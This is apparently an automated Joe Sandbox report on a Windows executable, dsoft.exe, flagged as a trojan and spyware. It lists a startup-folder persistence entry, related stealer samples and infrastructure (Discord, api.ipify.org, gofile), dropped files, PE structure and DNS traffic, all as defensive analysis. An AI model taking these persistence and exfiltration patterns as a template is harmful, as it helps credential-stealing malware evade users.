Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dsoft.exe
Detection:	MAL
Classification:	mal92.troj.adwa.spyw.winEXE@81/183@5/6
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe
Excluded IPs from analysis (whitelisted): 20.231.128.66, 20.190.181.23, 20.190.181.0, 40.126.53.6, 40.126.53.15, 40.126.53.8, 40.126.53.10, 20.231.128.65, 20.12.23.50, 20.189.173.22, 20.242.39.171, 20.3.187.198, 13.107.246.63
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, dns.msftncsi.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target dsoft.exe, PID 2248 because there are no executed function
Execution Graph export aborted for target dsoft.exe, PID 6956 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
VT rate limit hit for: dsoft.exe

Simulations

Behavior and APIs

Time	Type	Description
19:02:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.138.232	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse
	http://mee6.xyz	Get hash	malicious	Unknown	Browse
	webhook.exe	Get hash	malicious	Unknown	Browse
	chos.exe	Get hash	malicious	Unknown	Browse
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	CStealer	Browse
	dens.exe	Get hash	malicious	Python Stealer, Exela Stealer, Waltuhium Grabber	Browse
45.112.123.126	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	chos.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse
	Kameta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse
104.26.13.205	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	162.159.138.232
	http://mee6.xyz	Get hash	malicious	Unknown	Browse	162.159.138.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	arm.elf	Get hash	malicious	Unknown	Browse	162.159.137.232
	webhook.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	zapret.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	162.159.137.232
	chos.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	phost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
store4.gofile.io	chos.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
bg.microsoft.map.fastly.net	Installer eSPT Masa PPh versi 2.0#U007e26022009.exe	Get hash	malicious	BlackMoon	Browse	199.232.210.172
	Installer eSPT Masa PPh versi 2.0#U007e26022009.exe	Get hash	malicious	BlackMoon	Browse	199.232.214.172
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	199.232.214.172
	3KFFG52TBI.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	wp.bat	Get hash	malicious	Unknown	Browse	199.232.210.172
api.ipify.org	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205
	markiz.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	utkin.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0	Get hash	malicious	Unknown	Browse	104.26.12.205
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	tg.exe	Get hash	malicious	Babadeda	Browse	172.67.74.152
	tg.exe	Get hash	malicious	Babadeda	Browse	104.26.12.205
	setup.exe	Get hash	malicious	Babadeda	Browse	104.26.13.205
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	104.18.26.193
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.190.234
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	172.64.150.63
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.80.1
CLOUDFLARENETUS	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	104.18.26.193
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.190.234
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	172.64.150.63
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.80.1
DIGITALOCEAN-ASNUS	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	159.89.214.117
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	104.248.15.35
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	104.248.15.35
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	159.89.3.22
	mark_v7.exe	Get hash	malicious	Unknown	Browse	167.99.31.61
	telnet.x86.elf	Get hash	malicious	Unknown	Browse	138.68.169.173
	armv7l.elf	Get hash	malicious	Mirai	Browse	138.197.191.101
	nabspc.elf	Get hash	malicious	Unknown	Browse	46.101.240.213
	arm.elf	Get hash	malicious	Unknown	Browse	134.122.107.59
	a1K847qsM0.exe	Get hash	malicious	Njrat	Browse	167.71.56.116
AMAZON-02US	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	13.225.38.160
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	176.34.6.240
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	108.151.215.53
	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	52.211.89.170
	letsVPN.exe	Get hash	malicious	Unknown	Browse	18.136.139.158
	letsVPN.exe	Get hash	malicious	Unknown	Browse	13.227.9.24
	Aqua.x86.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	mips64.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	34.249.145.219
	m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.171.230.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	676556be12ac3.vbs	Get hash	malicious	Mint Stealer	Browse	31.14.70.245
	PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta	Get hash	malicious	Mint Stealer	Browse	31.14.70.245
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Hkeyboard.dll	Get hash	malicious	Unknown	Browse	31.14.70.245
	67618a47ee8c5.vbs	Get hash	malicious	Mint Stealer	Browse	31.14.70.245
	PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta	Get hash	malicious	Mint Stealer	Browse	31.14.70.245

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_ARC4.pyd	app.exe	Get hash	malicious	Unknown	Browse
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	dll.dll.0.dll	Get hash	malicious	Unknown	Browse
	dll.dll.0.dll	Get hash	malicious	Unknown	Browse
	explorer.exe.0.exe	Get hash	malicious	Unknown	Browse
	00#U2800.exe	Get hash	malicious	Unknown	Browse
	prank.exe	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.FileRepMalware.5539.23420.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_Salsa20.pyd	app.exe	Get hash	malicious	Unknown	Browse
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Akira Stealer	Browse
	SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	dll.dll.0.dll	Get hash	malicious	Unknown	Browse
	dll.dll.0.dll	Get hash	malicious	Unknown	Browse
	explorer.exe.0.exe	Get hash	malicious	Unknown	Browse
	00#U2800.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.6989965032233245
Encrypted:	false
SSDEEP:	96:v9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDPM0OcX6gY/7ECFV:39damqT3ThITst0E5DPKcqgY/79X
MD5:	56976443600793FF2302EE7634E496B3
SHA1:	018CE9250732A1794BBD0BDB8164061022B067AA
SHA-256:	10F461A94C3D616C19FF1A88DEC1EFEA5194F7150F5D490B38AC4E1B31F673DD
SHA-512:	A764C636D5D0B878B91DC61485E8699D7AA36F09AA1F0BD6AF33A8652098F28AEB3D7055008E56EBFC012BD3EA0868242A72E44DED0C83926F13D16866C31415
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: app.exe, Detection: malicious, Browse Filename: 231210-10-Creal-33652f.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse Filename: dll.dll.0.dll, Detection: malicious, Browse Filename: dll.dll.0.dll, Detection: malicious, Browse Filename: explorer.exe.0.exe, Detection: malicious, Browse Filename: 00#U2800.exe, Detection: malicious, Browse Filename: prank.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.5539.23420.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...L...L...L......L.q.M...L..M...L...M...L.q.I...L.q.H...L.q.O...L...D...L...L...L.......L...N...L.Rich..L.........PE..d....y.e.........." ...#............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\dsoft.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.6989965032233245
Encrypted:	false
SSDEEP:	96:v9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDPM0OcX6gY/7ECFV:39damqT3ThITst0E5DPKcqgY/79X
MD5:	56976443600793FF2302EE7634E496B3
SHA1:	018CE9250732A1794BBD0BDB8164061022B067AA
SHA-256:	10F461A94C3D616C19FF1A88DEC1EFEA5194F7150F5D490B38AC4E1B31F673DD
SHA-512:	A764C636D5D0B878B91DC61485E8699D7AA36F09AA1F0BD6AF33A8652098F28AEB3D7055008E56EBFC012BD3EA0868242A72E44DED0C83926F13D16866C31415
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...L...L...L......L.q.M...L..M...L...M...L.q.I...L.q.H...L.q.O...L...D...L...L...L.......L...N...L.Rich..L.........PE..d....y.e.........." ...#............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................................

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.991077453114403
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dsoft.exe
File size:	15'497'216 bytes
MD5:	42b4b335289128a94efb934d0080dab3
SHA1:	fed72d52ff0a2231301410c80aee03cf0285b09e
SHA256:	aa3f588529429795e1e0e72e430aef58a9190e72e01db662775e2c0d3c8a4420
SHA512:	1df2cb5cecdc7ca05abf5c08e6b436eff0844c506786fbcf9f8366277344ecf00e72a530639fdb24b6ce9d02ccfab70c1b6ef889e3a62ca377ad1f97957cd231
SSDEEP:	393216:LPiIE7YoPQjdQuslSq99oWOv+9fguz6L8/gw:A7rPQjdQuSDorvSYuzh/9
TLSH:	26F6335163945CF5F9A3A13D8812C858DA71F91117B0E2CB43B8DAAA0FA73E07D7AF50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h7..,Vd.,Vd.,Vd.g.g.$Vd.g.a..Vd.g.`.&Vd....(Vd..a..Vd..`.=Vd..g.%Vd.g.e.'Vd.,Ve..Vd..+`.9Vd..+f.-Vd.Rich,Vd.........PE..d..

Entrypoint:	0x14000c200
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x661C28F4 [Sun Apr 14 19:05:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	20d446c1cb128febd23deb17efb67cf6

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cde4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0xe86c91	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x2298	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xecd000	0x75c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a330	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a1f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29ba0	0x29c00	6f12541b07558e1c46246b2a798f0b6d	False	0.5534068581586826	data	6.4875591564260615	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12c0c	0x12e00	4662f035805967d0a672e23920b2dbdd	False	0.5150688120860927	data	5.809408935470456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3338	0xe00	99d84572872f2ce8d9bdbc2521e1966e	False	0.1328125	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8271683819747706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x2298	0x2400	a2a3bd363becd437dc0a7e6907c97754	False	0.4705946180555556	data	5.327377301155407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	52ec5387fbc7d960d9158c15aab19421	False	0.388671875	data	2.780917990964078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0xe86c91	0xe86e00	06f387b6d56497455e2886a7c3630554	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xecd000	0x75c	0x800	4138d4447f190c2657ec208ef31be551	False	0.5458984375	data	5.240127521097618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x46368	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.585820895522388
RT_ICON	0x47210	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.7360108303249098
RT_ICON	0x47ab8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.755057803468208
RT_ICON	0x48020	0x952c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9975384937676757
RT_ICON	0x5154c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.3887966804979253
RT_ICON	0x53af4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.49530956848030017
RT_ICON	0x54b9c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.7207446808510638
RT_ICON	0x55004	0x8fbf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9963042473980271
RT_ICON	0x5dfc4	0x3dfa	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9845581747132233
RT_RCDATA	0x61dc0	0xe6a934	PE32+ executable (GUI) x86-64, for MS Windows	0.8678836822509766
RT_GROUP_ICON	0xecc6f4	0x14	data	1.2
RT_GROUP_ICON	0xecc708	0x14	data	1.2
RT_GROUP_ICON	0xecc71c	0x68	data	0.7019230769230769
RT_MANIFEST	0xecc784	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 20:02:36.629195929 CET	56128	53	192.168.2.4	1.1.1.1
Dec 29, 2024 20:02:36.766999960 CET	53	56128	1.1.1.1	192.168.2.4
Dec 29, 2024 20:02:38.559184074 CET	55315	53	192.168.2.4	1.1.1.1
Dec 29, 2024 20:02:38.697907925 CET	53	55315	1.1.1.1	192.168.2.4
Dec 29, 2024 20:02:40.765474081 CET	49693	53	192.168.2.4	1.1.1.1
Dec 29, 2024 20:02:40.904120922 CET	53	49693	1.1.1.1	192.168.2.4
Dec 29, 2024 20:02:43.404433012 CET	61428	53	192.168.2.4	1.1.1.1
Dec 29, 2024 20:02:43.493402958 CET	57141	53	192.168.2.4	1.1.1.1
Dec 29, 2024 20:02:43.631263971 CET	53	57141	1.1.1.1	192.168.2.4
Dec 29, 2024 20:02:43.944029093 CET	53	61428	1.1.1.1	192.168.2.4

